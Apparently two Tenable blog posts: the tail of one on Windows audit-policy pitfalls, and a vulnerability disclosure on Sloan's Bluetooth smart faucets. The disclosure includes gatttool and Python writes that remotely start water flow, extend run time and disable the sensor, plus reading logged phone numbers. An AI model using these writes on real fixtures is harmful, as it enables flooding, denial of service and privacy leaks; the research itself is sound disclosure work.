➡️ Tenable.ad recommendation: do not rely on default values for Advanced audit policy settings: explicitly configure the desired value (No Auditing, Success, Failure, or Success and Failure) for each setting of interest.

Be even more careful when migrating from a basic audit policy: make sure to export the resulting policy you had on a normal machine, and convert it to all the appropriate advanced settings to prevent any regression in logging. And as usual with GPOs, especially for security settings, aim to create a single security GPO linked at the highest possible level, instead of spreading those settings across many lower-level GPOs.

Surprise #4 — Settings defined by GPOs are not merged

What happens when a machine is covered by several GPOs which define audit policy settings? What if one GPO enables “Success” auditing while another enables “Failure” auditing, is there a merge and would we obtain “Success and Failure”?

Answer: there is no merge at the setting level, and only the value of the GPO with the highest priority is applied. This is actually coherent with the way the Group Policy engine usually works, so not really a surprise, but still to keep in mind.

Here is a demonstration where we want to configure auditing on domain controllers. Two GPOs apply to those servers:

“Default Domain Policy” linked at the top of the Active Directory domain

  • “Audit Account Lockout” is set to “Success and Failure” (yellow highlighting)
  • “Audit Logon” is set to “Success” (red highlighting)

“Default Domain Controllers Policy” linked to the “Domain Controllers” organizational unit

  • “Audit Logoff” is set to “Success and Failure” (blue highlighting)
  • “Audit Logon” is set to “Failure” (red highlighting)

Now let’s see the resulting audit policy:

We notice that the conflicting values for “Logon” (red highlighting) were not merged, instead it is the value of the “Default Domain Controllers Policy”. This GPO won as per the usual GPO precedence rules.

We also observe that the values for “Logoff” (blue highlighting) from the “Default Domain Controllers Policy” and “Account Lockout” (yellow highlighting) from the “Default Domain Policy” are both properly applied because those were not in conflict.

Here is how Microsoft Advanced security auditing FAQ explains it:

By default, policy options that are set in GPOs and linked to higher levels of Active Directory sites, domains, and OUs are inherited by all OUs at lower levels. However, an inherited policy can be overridden by a GPO that is linked at a lower level.

You can also read more about GPO Processing Order in the [MS-GPOL] specification.

➡️ Tenable.ad recommendation: keep in mind that conflicting audit settings are not merged.
If you want to define a domain-wide security auditing GPO, you should ensure that no other GPO at a lower OU level overrides its settings. If necessary, you can set this domain-wide GPO as “Enforced”, even if this is not our preferred option as it can become confusing when managing a large set of GPOs.

If you are only concerned about auditing on domain controllers, you can link a GPO to the “Domain Controllers” organizational unit, as long as there is no domain-level “Enforced” GPO overriding audit policy settings.

Surprise #5 — Only one tool properly shows the effective audit policy

We have just shown that we can have many surprises when configuring auditing, so we really would like a way to see the effective audit policy on a system to confirm that it is as expected.

We could be tempted to use tools which compute the result of GPOs (RSoP), but…

For example, “rsop.msc” does not even seem to support advanced audit policy, which is not too surprising since it is deprecated! See how this section is used in the GPO editor on the right-hand side whereas it is missing in “rsop.msc” on the left-hand side:

And with “gpresult.exe”, if we have basic and advanced audit policies, we will see both: which one applies?

And what about settings that might have been configured locally and not through a GPO (which is not advised…)?

The only supported tool which can properly read the current effective audit policy is “auditpol.exe”, as you may have guessed from our previous screenshots. This is confirmed by a Microsoft blog post. For those who want to dig deeper: “auditpol.exe” calls AuditQuerySystemPolicy, which finally calls the “LsarQueryAuditPolicy” RPC in LSASS.

➡️ Tenable.ad recommendation: only trust the following command to see the effective audit policy on machines: “auditpol.exe /get /category:*”

Surprise bonus — Confusions in the specification

Configuring advanced audit policy in a GPO creates an “audit.csv” file which is described in the [MS-GPAC] Microsoft open specification. We found a mistake in one of the examples:

Machine Name,Policy Target,Subcategory,Subcategory GUID,Inclusion Setting,Exclusion Setting,Setting Value
TEST-MACHINE,System,IPsec Driver,{0CCE9213-69AE-11D9-BED3-505054503030},No Auditing,,0
TEST-MACHINE,System,System Integrity,{0CCE9212-69AE-11D9-BED3-505054503030},Success,,1
TEST-MACHINE,System,IPsec Extended Mode,{0CCE921A-69AE-11D9-BED3-505054503030},Success and Failure,,3
TEST-MACHINE,System,File System,{0CCE921D-69AE-11D9-BED3-505054503030},Not specified,,0

On the right-hand columns we have the setting name (such as “No Auditing”, “Success”, etc.) and the corresponding numerical value (0, 1, 3…). We can see that according to the first and last lines the value “0” is associated with both “No Auditing” and “Not specified” which does not make sense. Fortunately the text value is ignored: “value of InclusionSetting is for user readability only and is ignored when the advanced audit policy is applied”.
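Since only the numeric value is authoritative, a script auditing an audit.csv can key off the Setting Value column alone. A minimal sketch; the value meanings below are inferred from the spec and our observations (0 = disabled, 4 = not specified), so treat them as our reading rather than gospel:

```python
import csv
import io

# Observed/inferred meanings of the Setting Value column.
SETTING_VALUES = {
    "0": "No Auditing (disabled)",
    "1": "Success",
    "2": "Failure",
    "3": "Success and Failure",
    "4": "Not specified",
}

AUDIT_CSV = """Machine Name,Policy Target,Subcategory,Subcategory GUID,Inclusion Setting,Exclusion Setting,Setting Value
TEST-MACHINE,System,System Integrity,{0CCE9212-69AE-11D9-BED3-505054503030},Success,,1
TEST-MACHINE,System,IPsec Extended Mode,{0CCE921A-69AE-11D9-BED3-505054503030},Success and Failure,,3
"""

# Ignore the human-readable Inclusion Setting; trust only Setting Value.
policy = {row["Subcategory"]: SETTING_VALUES[row["Setting Value"]]
          for row in csv.DictReader(io.StringIO(AUDIT_CSV))}
```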

Also, we found the specification a bit confusing regarding the values of “0” and “4”:

A value of “0”: Indicates that this audit subcategory setting is unchanged.
A value of “4”: Indicates that this audit subcategory setting is set to None.

Our observations actually show that:

  • A value of “0” means that auditing is “disabled”, which corresponds to this in the graphical editor:
  • A value of “4” means that auditing is “not specified”, and thus the default value should apply (except when it does not, as shown before), which would correspond to this in the graphical editor (except that in this case the editor does not even generate a line for this setting in “audit.csv”):

Don’t make your SOC blind to Active Directory attacks: 5 surprising behaviors of Windows audit… was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Plumbing the Depths of Sloan’s Smart Bathroom Fixture Vulnerabilities

By: Ben Smith
30 June 2021 at 13:03

As I stood in line at my local donut shop, I idly began scanning nearby Bluetooth Low Energy (BLE) devices. There were several high-rises nearby, and who knows what interesting things lurk in those halls. Typically, I’ll see consumer technology like Apple products, fitness trackers, entertainment systems, but that day I saw something that piqued my interest… Device Name: FAUCET ADSKU01 A0174. A bluetooth… faucet?! I had to know more. Since I clearly did not own this particular device and also didn’t want to risk a flood, I went home and looked up all I could find about these SmartFaucets while greedily gobbling a glazed donut or two.

Device Name: FAUCET

The device belongs to a line of SmartFaucets and Flushometers made by Sloan Valve Company. I had to find one I could use for testing. Their connected devices include the Sloan SmartFaucets Optima EAF, Optima ETF/EBF, and BASYS EFX (these require an external adapter), as well as Flushometers such as SOLIS; they can be viewed over at https://www.sloan.com/design/connected-products. The app to connect to these devices is called SmartConnect and is available in the Google Play or Apple App stores.

An update to Sloan’s feature checklist

A Quick Bluetooth Glossary

Bluetooth Classic — This is the original Bluetooth protocol still widely used. Sometimes it will be referred to as “BR” or “EDR.” Devices are connected one to one.

Bluetooth Low Energy (BLE) — This is actually a different protocol from Bluetooth Classic. It has lower energy requirements, and devices can interoperate one-to-one, one-to-many, or even many-to-many. Almost everywhere we mention Bluetooth in this article, we mean BLE, and not Bluetooth Classic.

Services — Technically part of the “GATT” BLE layer, services are groupings of characteristics by function.

Characteristics — Part of the “GATT” BLE layer, characteristics are UUID/value pairs on a device. The value can be read, written to, and more, depending on permissions. Sometimes it’s helpful to think of them as UDP ports with (generally) very simple services.

UUIDs — Random numbers used to refer to services and characteristics. Some are assigned by the Bluetooth SIG, while others are set by the device’s manufacturer.

Sloan SmartConnect App

SmartConnect App has a button to “Dispense Water”

As its sole protection mechanism, the app requires a phone number prior to use and then sends a code to that number.

More SmartConnect app functionality

After that, quite an array of features are available. Let’s see what we can find out with an actual device.

SmartFaucet

Sloan EBF615-4 Internals

I managed to acquire a Sloan EBF615-4 Optima Plus, added batteries, and plugged in the faucet. When I wave my hand in front of the IR sensor, I can hear the clicking of the faucet mechanism allowing a potential flow of water to course through the spigot. This is good as I’ll have some way of knowing if we’re getting somewhere. I’d already installed the SloanConnect app, and registered with an actual phone number, so I was able to connect to the device.

Let’s start by using hcitool to scan for BLE devices nearby. Hcitool is a Linux utility for scanning for Bluetooth devices and interacting with our Bluetooth adapter. The ‘lescan’ option allows us to scan for Bluetooth Low Energy. The device we’re interested in is aptly named “FAUCET”.

pi@rpi4:~ $ sudo hcitool lescan | grep FAUCET
08:6B:D7:20:00:01 FAUCET ADSKU02 A0121
08:6B:D7:20:00:01 FAUCET ADSKU02 A0121

Now that we know its MAC address, we can use gatttool, a Linux utility for interacting with BLE devices, to query the BLE services:

pi@rpi4:~ $ sudo gatttool -b 08:6B:D7:20:00:01 --primary
attr handle = 0x0001, end grp handle = 0x0005 uuid: 00001800-0000-1000-8000-00805f9b34fb
attr handle = 0x0006, end grp handle = 0x0009 uuid: 00001801-0000-1000-8000-00805f9b34fb
attr handle = 0x000a, end grp handle = 0x000e uuid: 0000180a-0000-1000-8000-00805f9b34fb
attr handle = 0x000f, end grp handle = 0x002d uuid: d0aba888-fb10-4dc9-9b17-bdd8f490c900
attr handle = 0x002e, end grp handle = 0x0031 uuid: 0000180f-0000-1000-8000-00805f9b34fb
attr handle = 0x0032, end grp handle = 0x0050 uuid: d0aba888-fb10-4dc9-9b17-bdd8f490c910
attr handle = 0x0051, end grp handle = 0x0081 uuid: d0aba888-fb10-4dc9-9b17-bdd8f490c920
attr handle = 0x0082, end grp handle = 0x009d uuid: d0aba888-fb10-4dc9-9b17-bdd8f490c940
attr handle = 0x009e, end grp handle = 0x00a1 uuid: d0aba888-fb10-4dc9-9b17-bdd8f490c950
attr handle = 0x00a2, end grp handle = 0x00ba uuid: d0aba888-fb10-4dc9-9b17-bdd8f490c960
attr handle = 0x00bb, end grp handle = 0x00d9 uuid: d0aba888-fb10-4dc9-9b17-bdd8f490c970
attr handle = 0x00da, end grp handle = 0xffff uuid: 1d14d6ee-fd63-4fa1-bfa4-8f47b42119f0

and their characteristics:

pi@rpi4:~ $ sudo gatttool -b 08:6B:D7:20:00:01 --characteristics
handle = 0x0002, char properties = 0x0a, char value handle = 0x0003, uuid = 00002a00-0000-1000-8000-00805f9b34fb
handle = 0x0004, char properties = 0x02, char value handle = 0x0005, uuid = 00002a01-0000-1000-8000-00805f9b34fb
handle = 0x00db, char properties = 0x08, char value handle = 0x00dc, uuid = f7bf3564-fb6d-4e53-88a4-5e37e0326063
handle = 0x00de, char properties = 0x04, char value handle = 0x00df, uuid = 984227f3-34fc-4045-a5d0-2c581f81a153

Once we reverse the Android app, we can hopefully find variable names that reference these UUIDs and determine their function.

One thing I’ve noticed while doing this is that the device seems to stop beaconing every so often, and I need to either press a button on it OR wait a bit OR unseat and reseat the batteries. It’s possible that it limits connections over a period of time.

Let’s take a look back at the app.

SmartConnect Again

After pulling the app off of my phone using adb and then reversing it with jadx, I start searching for interesting bits. The first one to jump out was:

public final void dispenseWater() {
    if (getMainViewModel().getConnectionState().getValue() == ConnectionState.CONNECTED) {
        getMainViewModel().getConnectionState().setValue(ConnectionState.DISPENSING_WATER);
        BluetoothGattCharacteristic bluetoothGattCharacteristic = getMainViewModel().getGattCharacteristics().get(UUID.fromString(GattAttributesKt.UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE));
        if (bluetoothGattCharacteristic != null) {
            bluetoothGattCharacteristic.setValue("1");
        }
        FragmentActivity activity = getActivity();
        if (activity != null) {
            BluetoothLeService bluetoothLeService = ((MainActivity) activity).getBluetoothLeService();
            if (bluetoothLeService != null) {
                bluetoothLeService.writeCharacteristic(bluetoothGattCharacteristic);
                return;
            }
            return;
        }
        throw new TypeCastException("null cannot be cast to non-null type com.smartwave.sloanconnect.MainActivity");
    }
}

Seems like it’ll be pretty easy to make this thing flow. Now we just need to figure out the BLE characteristic UUID referenced by UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE. This is made incredibly easy thanks to a nice table of UUID variables.

public static final String UUID_CHARACTERISTIC_APP_IDENTIFICATION_PASS_CODE = "d0aba888-fb10-4dc9-9b17-bdd8f490c954";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE = "d0aba888-fb10-4dc9-9b17-bdd8f490c92a";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_FLUSH_ON_OFF = "d0aba888-fb10-4dc9-9b17-bdd8f490c946";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_SENSOR_RANGE = "d0aba888-fb10-4dc9-9b17-bdd8f490c942";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_STATISTICS_INFO_NUMBER_OF_ALL_FLUSHES = "d0aba888-fb10-4dc9-9b17-bdd8f490c916";
public static final String UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FLUSH_VOLUME_CHANGE = "f89f13e7-83f8-4b7c-9e8b-364576d88334";
public static final String UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE = "f89f13e7-83f8-4b7c-9e8b-364576d88361";

Wow. In addition to finding our water dispensing UUID, there are a lot of other interesting variable names. A select few of ~100 are shown above. It looks like this thing supports over-the-air (OTA) firmware updates, tons of diagnostic and sensor settings, possible security settings, and more.

Now that we know the UUID that turns on the water, let’s use NRF Connect to see what we can do. I’m switching over to NRF Connect from gatttool because it handles the connection easily. Since the faucet seems to ‘time out’ or disallow connections after a period of time, this is useful so we don’t lose our connection and reset everything.

The faucet’s BLE advertising information
nRF Connect for Desktop showing the faucet’s Services

In the decompiled ‘dispenseWater()’ function above, we saw that the function basically sends a ‘1’ to the UUID stored in the variable UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE. Luckily we can find the UUID in the table we found:

public static final String UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE = "d0aba888-fb10-4dc9-9b17-bdd8f490c965";

Cool. Let’s write to that UUID. The default value is 0x30, ASCII ‘0’. Let’s write 0x31, ASCII ‘1’, since that’s what the code does. I tried writing other numbers first but nothing else did anything, until…

nRF Connect view showing flow being enabled.

I barely refrained from yelping for joy when I heard the faucet’s telltale ‘click’ indicating the spigot had activated. Since the faucet isn’t hooked up to a water source (hey, i’m not a plumber), you’ll have to bear with the above anti-climactic demo.

We should be able to do this with gatttool via:

$ sudo gatttool -b 08:6B:D7:20:00:01 --char-write-req -a 0x00b3 -n 31
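The same write can also be scripted with a BLE library such as bleak (a third-party package; this is a sketch I have not tested against the hardware). The MAC address and UUID come from the scans above; the import is deferred inside the function so the constants can be reused without bleak installed.

```python
import asyncio

FAUCET_MAC = "08:6B:D7:20:00:01"
DISPENSE_UUID = "d0aba888-fb10-4dc9-9b17-bdd8f490c965"
DISPENSE_ON = b"1"  # ASCII '1', mirroring the app's dispenseWater()

async def dispense_water() -> None:
    from bleak import BleakClient  # pip install bleak
    async with BleakClient(FAUCET_MAC) as client:
        # Write-with-response, like gatttool's char-write-req.
        await client.write_gatt_char(DISPENSE_UUID, DISPENSE_ON, response=True)

if __name__ == "__main__":
    asyncio.run(dispense_water())
```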

Flush Toilet

Although I don’t have a smart Flushometer, it works very similarly to the faucet. We can see the code for “flushToilet()” is almost identical:

public static final void flushToilet(BluetoothLeService bluetoothLeService, MainViewModel mainViewModel) {
    Intrinsics.checkParameterIsNotNull(bluetoothLeService, "$this$flushToilet");
    Intrinsics.checkParameterIsNotNull(mainViewModel, "mainViewModel");
    if (mainViewModel.getConnectionState().getValue() != ConnectionState.FLUSHING_TOILET) {
        mainViewModel.getConnectionState().setValue(ConnectionState.FLUSHING_TOILET);
        BluetoothGattCharacteristic bluetoothGattCharacteristic = mainViewModel.getGattCharacteristics().get(UUID.fromString(GattAttributesKt.UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE));
        if (bluetoothGattCharacteristic != null) {
            bluetoothGattCharacteristic.setValue("1");
        }
        bluetoothLeService.writeCharacteristic(bluetoothGattCharacteristic);
    }
}

And we can look up the UUID for the flush variable:

public static final String UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE = "f89f13e7-83f8-4b7c-9e8b-364576d88361";

Even though I don’t intend to acquire a smart Flushometer, I can confidently say I know what’s happening here.

Unlock Key

There seems to be a concept of an unlock key in the android app.

public final void setGattCharacteristics(List<? extends BluetoothGattService> list) {
    DeviceData value;
    if (list != null) {
        for (T t : list) {
            Timber.i("Service: " + t.getUuid(), new Object[0]);
            List<BluetoothGattCharacteristic> characteristics = t.getCharacteristics();
            Intrinsics.checkExpressionValueIsNotNull(characteristics, "service.characteristics");
            for (T t2 : characteristics) {
                Map<UUID, BluetoothGattCharacteristic> map = this.gattCharacteristics;
                Intrinsics.checkExpressionValueIsNotNull(t2, "characteristic");
                UUID uuid = t2.getUuid();
                Intrinsics.checkExpressionValueIsNotNull(uuid, "characteristic.uuid");
                map.put(uuid, t2);
                if (Intrinsics.areEqual(t2.getUuid(), UUID.fromString(GattAttributesKt.UUID_CHARACTERISTIC_APP_IDENTIFICATION_UNLOCK_KEY)) && (value = this.activeDeviceData.getValue()) != null) {
                    value.setHasSecurity(true);
                }
            }
        }
    }
}

The setGattCharacteristics function is called on connection to build the list of services and characteristics. Here, if there’s an unlock key set, the app marks a ‘security’ value as true. Later on this value is checked when a few functions are called, but so far it looks like it just appends some notes if it is set. In a few scenarios, a beginSecurityProtocol() function is called, and it will read a ‘note’ from the device if security is enabled. This ‘note’ can be used to store the phone number of the last person to change the setting. The security function seems to be more of a way to keep some data about what happened than any sort of actual security.

Flow Rate

The app has two different sets of code to keep the flow rate from being set too high, depending on whether we’re using liters or gallons.

if (doubleOrNull != null) {
    d = doubleOrNull.doubleValue();
}
if ((valueOf.length() == 0) || d < 1.3d) {
    d = 1.3d;
} else if (d > 9.9d) {
    d = 9.9d;
}
// OR:
if ((valueOf.length() == 0) || d < 0.3d) {
    d = 0.3d;
} else if (d > 2.6d) {
    d = 2.6d;
}

Since this is implemented in the app, I’ll bet the faucet accepts a much wider range. Of course, the actual flow is limited by whatever the line in can support (I’m not a plumber). Flow rate is controlled via the d0aba888-fb10-4dc9-9b17-bdd8f490c949 characteristic.

Flow Rate Value

It seems floats are written to the characteristic as two characters, in this case, 1 and 9 (1.9), which is one of the liters per minute (LPM) options. Let’s see what we can set it to.

So, we can’t set it to a 3-byte value, but we can set it to 0x3939 (9.9), and that seems to be the highest value to have any effect. Of note, we can also set it to even higher values like 0xFF39, and while that doesn’t seem to do anything, it still feels like a value that shouldn’t be allowed by logic on the device. Since I don’t have the faucet hooked up, I can’t test what happens when we set the flow rate really high (again, not a plumber). When it’s set to 0xFF39, the app tries to display it as 0.0. And we can set it to 9.9 via the app. So, unless we plug this thing into a water line, we’re not going to know what happens with the 0xFF39.
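The two-ASCII-character encoding we observed can be sketched like this ("19" on the wire means 1.9 LPM). The helper names are ours, not the app's:

```python
def encode_flow_rate(lpm: float) -> bytes:
    # 1.9 -> b"19": whole digit then tenths digit, each as ASCII.
    whole, tenths = divmod(round(lpm * 10), 10)
    return bytes(f"{whole}{tenths}", "ascii")

def decode_flow_rate(raw: bytes) -> float:
    # b"99" -> 9.9; int() accepts the single-byte slices directly.
    return int(raw[0:1]) + int(raw[1:2]) / 10
```

Nothing in this scheme stops a client from writing bytes outside the digit range (like the 0xFF39 above), which is why the device itself should validate the value.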

Activation Mode

“Activation Mode” controls how long water flows when the IR sensor is triggered. We can set it up to 120 seconds via the app. We’re all washing our hands a lot longer during COVID, but I know I can sing happy birthday to myself two or three times and still be under that 2-minute mark. Can we set it higher and cause the faucet to flow for a really long time?

There are two types of Activation Mode: Metered and On Demand. What’s the difference between them? Surely the internet will tell me.

A Google Play Store comment indicating confusion on Metered and On Demand flow rate

Nope, no luck there. There are a few variable definitions that may give us a clue. Could that On Demand value be a mistake, off by an order of magnitude?

public final class ActivationModeFragmentKt {
    private static final int METERED_MAX_VALUE = 120;
    public static final int METERED_MODE = 1;
    private static final int MIN_VALUE = 3;
    private static final int ON_DEMAND_MAX_VALUE = 1200;
    public static final int ON_DEMAND_MODE = 0;
}

Unfortunately those limits don’t seem to be enforced anywhere else. Let’s see if we can find the code that controls this. Two different characteristics control the run times for the two modes.

public static final String UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MAXIMUM_ON_DEMAND_RUN_TIME = "d0aba888-fb10-4dc9-9b17-bdd8f490c945";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_METERED_RUN_TIME = "d0aba888-fb10-4dc9-9b17-bdd8f490c944";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MODE_SELECTION = "d0aba888-fb10-4dc9-9b17-bdd8f490c943";
Activation Mode characteristics and values

And we can see how these are set on the device. I’m going to go ahead and assume that everything on this device is written as ASCII. So, Mode is set to 0x30 == "0", which we can see is ON_DEMAND_MODE. Then the Metered Run Time is set to 120 seconds, and On Demand is set to 30 seconds. Cool. Let’s see how high we can go. This is going to be painful, waiting many minutes for this thing to turn back off.

The On Demand characteristic set to 1130 seconds

Ok, we’ve set the On Demand time to 1130 seconds, about 18 minutes. I wave my hand in front of the faucet’s IR sensor and grab a cup of coffee. This is gonna take a while… That didn’t work; it shut off quickly. There must be some internal idea of how long is too long. I’ll flip the mode to Metered and set that pretty high. It seems Metered won’t take more than 3 bytes, so I’ll set the first digit to 9 for 920 seconds, or roughly 15 minutes. And then I’ll wait.

Metered Mode set to 920 seconds

It’s still going. There’s gotta be a better way to test. Currently, I wave my hand in front of the sensor once to engage the faucet, and then try periodically over the timer duration. It won’t make the click of engagement until the time is up. So, the next time I can wave my hand in front of the sensor and hear a click, I know the faucet’s timer has ended. This won’t be incredibly accurate or scientific. I set a 14 min timer and walked away. Annnnd somehow I walked right back in at the 15 minute mark and heard it click off. So, the highest value we can likely set for Metered mode is 999, which is 16.65 minutes. That’s a long time to leave the tap on. I wonder who would want to do something like that…
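If you want to script the run-time experiment, the writes boil down to two ASCII payloads. A sketch (UUIDs come from the decompiled app; the all-ASCII encoding is my assumption from the observed traffic):

```python
# Characteristic UUIDs lifted from the decompiled app
MODE_SELECTION = "d0aba888-fb10-4dc9-9b17-bdd8f490c943"
METERED_RUN_TIME = "d0aba888-fb10-4dc9-9b17-bdd8f490c944"

ON_DEMAND_MODE, METERED_MODE = 0, 1

def build_metered_writes(run_seconds: int):
    """Return the (characteristic UUID, payload) pairs to set a metered run time."""
    return [
        (MODE_SELECTION, str(METERED_MODE).encode("ascii")),
        (METERED_RUN_TIME, str(run_seconds).encode("ascii")),
    ]

# 999 s (16.65 minutes) is the largest 3-byte value, well past the app's 120 s cap
for uuid, payload in build_metered_writes(999):
    print(uuid, payload)
```

Each pair would be handed to a BLE write (e.g. bluepy’s Characteristic.write) against the connected faucet.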

Wet Bandits — Be on the lookout — These criminals are armed and clumsy

DoS

In addition to causing a flood, we can trigger the opposite effect. It’s possible to disable the faucet’s sensor completely by setting the Sensor Range to 0. Then the faucet won’t turn on no matter how close our hand gets or how vigorously we wave. In this case, we simply send a 0x30 (ASCII "0") to UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_SENSOR_RANGE.

Model and Version

It’s also possible to read the model and version number via these characteristics. Nothing super exciting here, but it could be useful if we were trying to find a specific version. Most BLE-enabled devices expose these via the standard “Device Information” service; these are separate from that, something Sloan must have thought necessary.

Firmware & Hardware
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_FIRMWARE_VERSION = "d0aba888-fb10-4dc9-9b17-bdd8f490c906";
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_HARDWARE_VERSION = "d0aba888-fb10-4dc9-9b17-bdd8f490c905";

Firmware: 0109

Hardware: 0175

Logged Phone Numbers

The “security” mode of the faucet logs the phone number stored in the app for certain events.

public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_BD_NOTE_CHANGE = "d0aba888-fb10-4dc9-9b17-bdd8f490c932";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_INTERVAL_CHANGE = "d0aba888-fb10-4dc9-9b17-bdd8f490c930";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_ON_OFF_CHANGE = "d0aba888-fb10-4dc9-9b17-bdd8f490c92e";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_TIME_CHANGE = "d0aba888-fb10-4dc9-9b17-bdd8f490c92f";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_FACTORY_RESET = "d0aba888-fb10-4dc9-9b17-bdd8f490c929";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_OD_OR_M_CHANGE = "d0aba888-fb10-4dc9-9b17-bdd8f490c92b";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE = "d0aba888-fb10-4dc9-9b17-bdd8f490c92a";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_METER_RUNTIME_CHANGE = "d0aba888-fb10-4dc9-9b17-bdd8f490c92c";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_OD_RUNTIME_CHANGE = "d0aba888-fb10-4dc9-9b17-bdd8f490c92d";
Phone numbers stored on faucet

I’ve conveniently set these to the Tenable support number 855–267–7044. In a real setup, this would be the phone number registered in the app that performed each specific task update. I attempted to see how wide the field was, and got up to 15 characters before it wouldn’t take any more.

It doesn’t seem like the app is parsing anything in the text fields, so no XSS that I can find.

The other interesting thing here is that any time someone makes a change to the faucet, the app causes their phone number to be stored on the faucet. This is then reflected back to any app that connects OR anyone that reads the characteristic. This isn’t mentioned in the app and I don’t see a privacy policy. Does GDPR apply to bathroom fixtures?

Aquis Dongle

What is Aquis? I don’t know. But there are several characteristics in the app for an Aquis Dongle. Could this be a new product line? A partnership with another company that this app will work with?

public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_FIRMWARE_VERSION = "d0aba888-fb10-4dc9-9b17-bdd8f490c90e";
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_HARDWARE_VERSION = "d0aba888-fb10-4dc9-9b17-bdd8f490c90d";
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_MANUFACTURING_DATE = "d0aba888-fb10-4dc9-9b17-bdd8f490c90c";
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SERIAL = "d0aba888-fb10-4dc9-9b17-bdd8f490c90b";
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SKU = "d0aba888-fb10-4dc9-9b17-bdd8f490c90F";

There does seem to be a company called Aquis that offers connected faucets. Perhaps they’re one of Sloan’s partners or produced the tech for Sloan.

Aquis Multifunctional Faucet feature sheet

That ‘optional service APP’ sounds just like what we’re looking at.

OTA Firmware Update

The service UUID 1d14d6ee-fd63-4fa1-bfa4-8f47b42119f0 maps to the variable name UUID_SERVICE_OTA in our variable definitions file. Indeed, a quick search reveals this to be the Silicon Labs OTA service, which also gives us insight into the chipset used here. We’ll have to dig into this.

OTA (“Over-The-Air”) is the method for writing firmware to various BLE chipsets. As far as I can tell, the major chipset manufacturers each have their own OTA spec, and the specs are not interoperable even when they share a name, so it can be helpful to have chipset-specific tools to manipulate OTA. Developers can also opt into various levels of security, including checking firmware signatures or not.

The Silicon Labs Gecko bootloader has three optional settings for secure firmware update:

  • Require signed firmware upgrade files.
  • Require encrypted firmware upgrade files.
  • Enable secure boot.

Silicon Labs defines these as:

  • Secure Boot refers to the verification of the authenticity of the application image in main flash on every boot of the device.
  • Secure Firmware Upgrade refers to the verification of the authenticity of an upgrade image before performing a bootload, and optionally enforcing that upgrade images are encrypted.

If none of those are selected by the developer, it’s possible to write any firmware to the device. As the faucet was quite expensive, I did not test firmware update and am merely pointing out that it’s exposed.

Using one of the SILabs android apps, we can quickly see that it’s possible to do an OTA firmware update. No telling what the firmware in place is checking for. I don’t want to break this thing yet.

I also grepped through the Android APK but don’t see anything that references the three OTA variable names; I guess they’ll implement updates in the future. This makes me think the OTA feature uses stock code from the SDK.

Hardware — BLE Adapters

These vulns should be exploitable via any BLE adapter, but since hardware can be finicky, the specific adapters I tested with are:

Cyberkinetic Effects or Why should I even care

Sure, turning on the water might not be the next million-dollar ransomware campaign, and flushing the toilets remotely seems like a great prank, but not much more. Still, there can be real, interesting effects. First off, these faucets aren’t usually for home use; they’re installed in office buildings, in groups. Turning on all of the faucets repeatedly or flushing all of the toilets could plausibly cause a flooding condition. Move over SYN flood, this is a sink flood.

But these devices aren’t networked! They have no IP! They’re limited by range! These are great points. However, the faucet likely has a 30 foot BLE range. This is well within range of some miscreant standing at their local donut shop near the office. A neighboring unit in a condo or apartment building would also be well within range. Also, most laptops and desktops include bluetooth adapters, so any malware infection is a potential vector. I always like to point out that a BLE device is only a hop away from any modern laptop.

Findings

  • Enable Water Dispense > Kinetic Effect
  • Change Flow Rate > Kinetic Effect
  • Change Activation Mode / Time > Kinetic Effect / DoS
  • Change Sensor Range to 0 > DoS
  • Maintenance Person Cell Phone Number Modification and Disclosure > Information Leakage
  • Enable Toilet Flush > Kinetic Effect
  • Model Number is writable > Modification of Assumed Immutable Data

PoC || GTFlow

